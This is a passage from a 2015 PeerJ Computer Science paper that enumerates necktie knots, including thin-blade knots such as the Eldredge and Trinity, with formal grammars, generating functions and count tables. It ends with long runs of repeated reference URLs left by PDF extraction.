mandatory for all other tuck sequences. For L, we remove all Hirsch et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.2 9/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.2 but CLU and RLU. For C, we remove all but RCU and LCU. This results in the following generating functions for R-final, L-final and C-final sequences, respectively. 
z3(2z3 − 2z2 + z + 1) 1 − 6z2 = z3 + z4 + 4z5 + 8z6 + 24z7 + 48z8 + 144z9 + 288z10 + 864z11 + 1,728z12 + 5,184z13 + O(z14) 2z4(2z2 − 2z − 1) 1 − 6z2 = 2z4 + 4z5 + 8z6 + 24z7 + 48z8 + 144z9 + 288z10 + 864z11 + 1,728z12 + 5,184z13 + O(z14) z3(2z3 − 2z2 + z + 1) 1 − 6z2 = z3 + z4 + 4z5 + 8z6 + 24z7 + 48z8 + 144z9 + 288z10 + 864z11 + 1,728z12 + 5,184z13 + O(z14). • Removing the references to the tuck move, we recover generating functions for the number of windings available for each tie length. We give these for R-final, L-final and C-final respectively. Summed up, these simply enumerate all possible T/W-strings of the corresponding lengths, and so run through powers of 2. z3 1 − z − 2z2 = z3 + z4 + 3z5 + 5z6 + 11z7 + 21z8 + 43z9 + 85z10 + 171z11 + 341z12 + 683z13 + O(z14) 2z4 (1 − 2z)(1 + z) = 2z4 + 2z5 + 6z6 + 10z7 + 22z8 + 42z9 + 86z10 + 170z11 + 342z12 + 682z13 + O(z14) z3 1 − z − 2z2 = z3 + z4 + 3z5 + 5z6 + 11z7 + 21z8 + 43z9 + 85z10 + 171z11 + 341z12 + 683z13 + O(z14). • For the full grammar of arbitrary depth knots, we set w to be a root of (8z6 − 4z4)ζ 3 + (−8z6 + 18z4 − 7z2)ζ 2 + (−16z6 + 14z4 − 6z2 + 2)ζ − 12z4 + 9z2 − 2 = 0 solved for ζ . Then the generating function for this grammar is: − 1 8z4 − 11z2 + 3  64w2z7 − 128wz7 + 32w2z6 − 64wz6 − 48z5w2 + 216z5w − 24w2z4 − 96z5 + 108wz4 + 8w2z3 − 48z4 − 110wz3 + 4w2z2 + 82z3 − 55z2w + 41z2 + 16zw − 16z + 8w − 8  = 2z2 + 4z3 + 20z4 + 40z5 + 192z6 + 384z7 + 1,896z8 + 3,792z9 + 19,320z10 + 38,640z11 + 202,392z12 + 404,784z13 + 2,169,784z14 + O(z15). Tables of counts For ease of reading, we extract the results from the generating functions above to more easy-to-reference tables here. Winding length throughout refers to the number of R/L/C symbols occurring, and thus is 1 larger than the W/T count. The cases enumerated by Fink & Mao (2000) are Hirsch et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.2 10/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.2 Winding length 3 4 5 6 7 8 9 Total # tie-knots 1 1 3 5 11 21 43 85 A knot with the thick blade active will cover up the entire knot with each new bow. As such, all thick blade active tie-knots will fall within the classification by Fink & Mao (2000). The modern case, thus, deals with thin blade active knots. As evidenced by the Trinity and the Eldredge knots, thin blade knots have a wider range of interesting façades and of interesting tuck patterns. For thick blade knots, it was enough to assume that the tuck happens last, and from the C region, the thin blade knots have a far wider variety. The case remains that unless the last move is a tuck—or possibly finishes in the C region—the knot will unravel from gravity. We can thus expect this to be a valid require- ment for the enumeration. There are often more valid tuck sites than the final position in a knot, and the tuck need no longer come from the C region: R and L are at least as valid. 
The computations in ‘Generating functions’ establish Winding length 3 4 5 6 7 8 9 10 11 12 13 Total # left windings 0 2 2 6 10 22 42 86 170 342 682 1,364 # right windings 1 1 3 5 11 21 43 85 171 341 683 1,365 # center windings 1 1 3 5 11 21 43 85 171 341 683 1,365 # left knots 0 2 4 8 24 48 144 288 864 1,728 5,184 8,294 # right knots 1 1 4 8 24 48 144 288 864 1,728 5,184 8,294 # center knots 1 1 4 8 24 48 144 288 864 1,728 5,184 8,294 # single tuck knots 2 4 12 24 72 144 432 864 2,592 4,146 15,552 24,882 total # knots 2 4 20 40 192 384 1,896 3,792 19,320 38,640 202,392 266,682 The first point where the singly tucked knots and the full range of knots deviate is at the knots with winding length 4; there are 12 singly tucked knots, and 8 knots that allow for a double tuck, namely: TTTTU TTWWU TWTTU TWWWU WTTTU WTWWU WWTTU WWWWU TTUTTU TTUWWU WWUTTU WWUWWU TTTWUU TTWTUU TWTTUU TWTTU’UU WTWWUU WTWWU’UU WWTWUU WWWTUU The reason for the similarity between the right and the center counts is that the winding sequences can be mirrored. Left-directed knots are different since the direction corresponds to the starting direction. Hence, a winding sequence for a center tuck can be mirrored to a winding sequence for a right tuck. In the preprint version of this paper, we claimed the total count of knots using only single-depth tucks to be 177,147. During the revision of the paper, we have discovered two errors in this claim: Hirsch et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.2 11/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.2 1. There is an off-by-one error in this count. 2. This count was done for tie-knots that allow tucks that are hidden behind the knot. Adding this extra space to the generating grammar produces the generating function 2z3 + 6z4 + 18z5 + 54z6 + 162z7 + 486z8 + 1,458z9 + 4,374z10 + 13,122z11 + 39,366z12 + 118,098z13 + O(z14) with a total of 177,146 tie-knots with up to 13 moves. AESTHETICS Fink & Mao (2000) propose several measures to quantify the aesthetic qualities of a necktie-knot; notably symmetry and balance, corresponding to the quantities #R − #L and the number of transitions from a streak of W to a streak of T or vice versa. By considering the popular thin-blade neck tie-knots: the Eldredge and the Trinity, as described in Krasny (2012a) and Krasny (2012b), we can immediately note that balance no longer seems to be as important for the look of a tie-knot as is the shape of its façade. Symmetry still plays an important role in knots, and is easy to calculate using the CLR notation for tie-knots. Knot TW-string CLR-string Balance Symmetry Eldredge TTTWWTTUTTWWU LCRLRCRLUCRCLU 3 0 Trinity TWWWTTTUTTU LCLRCRLCURLU 2 1 We do not in this paper attempt to optimize any numeric measures of aesthetics, as this would require us to have a formal and quantifiable measure of the knot façades. This seems difficult with our currently available tools. CONCLUSION In this paper, we have extended the enumeration methods originally used by Fink & Mao (2000) to provide a larger enumeration of necktie-knots, including those knots tied with the thin blade of a necktie to produce ornate patterns in the knot façade. We have found 4,094 winding patterns that take up to 13 moves to tie and are anchored by a final single depth tuck, and thus are reasonable candidates for use with a normal necktie. We chose the number of moves by examining popular thin-blade tie-knots—the Eldredge tie-knot uses 12 moves—and by experimentation with our own neckties. 
Most of these winding patterns allow several possible tuck patterns, and thus the 4,094 winding patterns give rise to 24,882 singly tucked tie-knots. We have further shown that in the limit, the language describing neck tie-knots is context free, with a regular sub-language describing these 24,882 knots. These counts, as well as the stated generating functions, are dependent on the correctness of the combstruct package in Maple, and the correctness of our encoding of these grammars as Maple code. We have checked the small counts and generated strings Hirsch et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.2 12/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.2 for each of the grammars against experiments with a necktie and with the results by Fink and Mao and our own catalogue. Questions that remain open include: • Find a way to algorithmically divide a knot description string into a body/façade distinction. • Using such a distinction, classify all possible knot façades with reasonably short necktie lengths. We have created a web-site that samples tie-knots from knots with at most 12 moves and displays tying instructions: http://tieknots.johanssons.org. The entire website has also been deposited with Figshare (Vejdemo-Johansson, 2015). All the code we have used, as well as a table with assigned names for the 2,046 winding patterns for up to 12 moves are provided as Supplemental Information to this paper. Winding pattern names start with R, L or C depending on the direction of the final tuck, and then an index number within this direction. We suggest augmenting this with the bit-pattern describing which internal tucks have been added—so that e.g., the Eldredge would be L-373.4 (including only the 3rd potential tuck from the start) and the Trinity would be L-110.2 (including only the 2nd potential tuck). Thus, any single-depth tuck can be concisely addressed. ACKNOWLEDGEMENTS We would like to thank the reviewers, whose comments have gone a long way to make this a far better paper, and who have caught several errors that marred not only the presentation but also the content of this paper. Reviewer 1 suggested a significant simplification of the full grammar in ‘Recursive tucks,’ which made the last generating function at all computable in reasonable time and memory. Reviewer 2 suggested we look into generating functions as a method for enumerations. As can be seen in ‘Generating functions,’ this suggestion has vastly improved both the power and ease of most of the results and calculations we provide in the paper. For these suggestions in particular and all other suggestions in general we are thankful to both reviewers. ADDITIONAL INFORMATION AND DECLARATIONS Funding MVJ was partially supported for this work by the 7th Framework Programme through the project Toposys (FP7-ICT-318493-STREP). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: 7th Framework Programme: FP7-ICT-318493-STREP. Hirsch et al. (2015), PeerJ Comput. 
Sci., DOI 10.7717/peerj-cs.2 13/15 https://peerj.com/computer-science/ http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://tieknots.johanssons.org http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2 Competing Interests DH and MLP are employees of Upstanding Hackers Inc. Author Contributions • Dan Hirsch and Anders Sandberg analyzed the data, wrote the paper, reviewed drafts of the paper. • Ingemar Markström analyzed the data, performed the computation work, reviewed drafts of the paper. • Meredith L. Patterson analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper. • Mikael Vejdemo-Johansson analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. Data Deposition The following information was supplied regarding the deposition of related data: Figshare: http://dx.doi.org/10.6084/m9.figshare.130013. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/ 10.7717/peerj-cs.2#supplemental-information. REFERENCES Chomsky N, Schützenberger M P. 1959. The algebraic theory of context-free languages. Studies in Logic and the Foundations of Mathematics 26:118–161. Fink T, Mao Y. 1999. Designing tie knots by random walks. Nature 398(6722):31–32 DOI 10.1038/17938. Fink T, Mao Y. 2000. Tie knots, random walks and topology. Physica A: Statistical Mechanics and its Applications 276(1):109–121 DOI 10.1016/S0378-4371(99)00226-5. Fink T, Mao Y. 2001. The 85 ways to tie a tie. London: Fourth Estate. Gruber H, Lee J, Shallit J. 2012. Enumerating regular expressions and their languages. ArXiv preprint. arXiv:1204.4982. Knorr A. 2010. Eldredge reloaded. http://xirdalium.net. [Blog Post] Available at http://xirdalium. net/2010/06/20/eldredge-reloaded/ (accessed 26 December 2012). Krasny A. 2012a. Eldredge tie knot—how to tie a eldredge necktie knot. http://agreeordie.com. [Blog Post] Available at http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge- knot (accessed 26 December 2012). Krasny A. 2012b. Trinity tie knot—how to tie a trinity necktie knot. http://agreeordie.com. [Blog Post] Available at http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott (accessed 26 December 2012). Sipser M. 2006. Introduction to the theory of computation. Vol. 2. Boston: Thomson Course Technology. Hirsch et al. (2015), PeerJ Comput. 
Sci., DOI 10.7717/peerj-cs.2 14/15 https://peerj.com/computer-science/ http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.6084/m9.figshare.130013 http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information 
http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.1038/17938 http://dx.doi.org/10.1016/S0378-4371(99)00226-5 http://arxiv.org/abs/1204.4982 http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ 
http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot 
http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com 
http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott 
